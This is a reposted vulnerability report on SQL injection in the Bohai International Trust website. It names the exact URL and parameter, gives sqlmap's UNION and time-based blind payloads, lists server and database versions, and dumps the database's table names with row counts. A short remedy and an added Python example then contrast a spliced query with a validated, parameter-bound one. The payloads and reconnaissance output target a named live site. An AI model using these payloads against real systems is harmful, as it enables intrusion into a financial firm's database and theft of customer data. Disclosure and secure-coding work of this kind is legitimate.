SQL injection vulnerability on the Bohai International Trust (渤海国际信托) main site
程序员文章站
2022-03-16 16:22:52
#1 URL
https://www.bohaitrust.com/
#2 Injection point
https://www.bohaitrust.com/Journal/favors/cid/4?newid=107
#3 Proof
Parameter: newid (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: newid=-3925) UNION ALL SELECT CONCAT(0x716a786b71,0x76555175746650765465,0x7170767671)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newid=107) AND SLEEP(5) AND (2974=2974
---
[22:46:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[22:46:32] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:46:32] [INFO] fetching tables for database: 'bohaitrust'
[22:46:32] [INFO] the SQL query used returns 45 entries
Database: bohaitrust
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ystar_vote_result       | 1391    |
| ystar_netvalue          | 486     |
| ystar_netvalue_old1231  | 447     |
| ystar_message           | 375     |
| ystar_article_content   | 304     |
| ystar_article           | 303     |
| ystar_document          | 297     |
| ystar_product_crm       | 269     |
| ystar_contact_bak0129   | 252     |
| ystar_contact           | 251     |
| ystar_product2          | 228     |
| ystar_product           | 191     |
| ystar_member            | 188     |
| ystar_product_bak0123   | 178     |
| ystar_product_bak0108   | 174     |
| ystar_auth_menu         | 147     |
| ystar_auth_rule         | 147     |
| ystar_journals_article  | 121     |
| ystar_journals_channel  | 61      |
| ystar_document_cate     | 54      |
| ystar_channel           | 44      |
| ystar_config_bak1202    | 44      |
| ystar_config            | 43      |
| ystar_vote_body         | 24      |
| ystar_member_sell       | 20      |
| ystar_journals_email    | 18      |
| ystar_member_apply      | 14      |
| ystar_advert            | 10      |
| ystar_auth_group_access | 10      |
| ystar_auth_user         | 10      |
| ystar_guestbook         | 8       |
| ystar_journals          | 8       |
| ystar_vote_subject      | 8       |
| ystar_auth_group        | 7       |
| ystar_gift              | 7       |
| ystar_member_lsdz       | 7       |
| ystar_advert_position   | 6       |
| ystar_apply_member      | 6       |
| ystar_product_log       | 6       |
| ystar_product_doc       | 4       |
| ystar_gift_cate         | 2       |
| ystar_memberneed_log    | 2       |
| ystar_product_zr        | 2       |
+-------------------------+---------+
Solution:
Filter the input.
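What "filter the input" means for this parameter, as an added example that is not code from the report or from the site: the query shape the sqlmap payloads imply (the raw GET value spliced into SQL inside parentheses) beside a version that accepts only a bare integer and binds it as a parameter. SQLite stands in for the MySQL backend, the table name is taken from the sqlmap listing above, the column names and the test rows are assumed, and the payload is constructed in the same shape as the report's UNION payload.

```python
import re
import sqlite3

# Added example, not code from the report or the site. sqlite3 stands in
# for the MySQL backend; the table name is from the report's sqlmap
# listing, the column names and rows are assumed.
NEWID_RE = re.compile(r"^[1-9][0-9]{0,9}$")  # a bare positive integer, nothing else


def validate_newid(raw):
    """Return newid as an int, or None when it is not a bare integer."""
    if raw is None or not NEWID_RE.match(raw):
        return None
    return int(raw)


def build_db():
    """Constructed in-memory stand-in for the bohaitrust database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ystar_journals_article (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO ystar_journals_article VALUES (?, ?)",
                   [(107, "issue 107"), (108, "issue 108")])
    return db


def favors_vulnerable(db, raw_newid):
    """The pattern the payloads imply: the raw GET value is spliced into the
    SQL text inside parentheses, so '-3925) UNION ALL SELECT ...' closes the
    comparison and appends an attacker-chosen SELECT."""
    sql = "SELECT title FROM ystar_journals_article WHERE (id=%s)" % raw_newid
    return db.execute(sql).fetchall()


def favors_fixed(db, raw_newid):
    """The report's remedy (filtering) plus a bound parameter: the value is
    rejected unless it is a bare integer, and it never becomes SQL text."""
    newid = validate_newid(raw_newid)
    if newid is None:
        return []  # caller should answer 400 Bad Request
    return db.execute("SELECT title FROM ystar_journals_article WHERE (id=?)",
                      (newid,)).fetchall()


# Constructed payload in the shape of the report's UNION payload, using
# SQLite's '--' line comment where MySQL would take '#'.
UNION_PAYLOAD = "-3925) UNION ALL SELECT 'injected'--"
```

The time-based payload from the report (`107) AND SLEEP(5) AND (2974=2974`) fails the same integer check, so the fixed handler never sends it to the database.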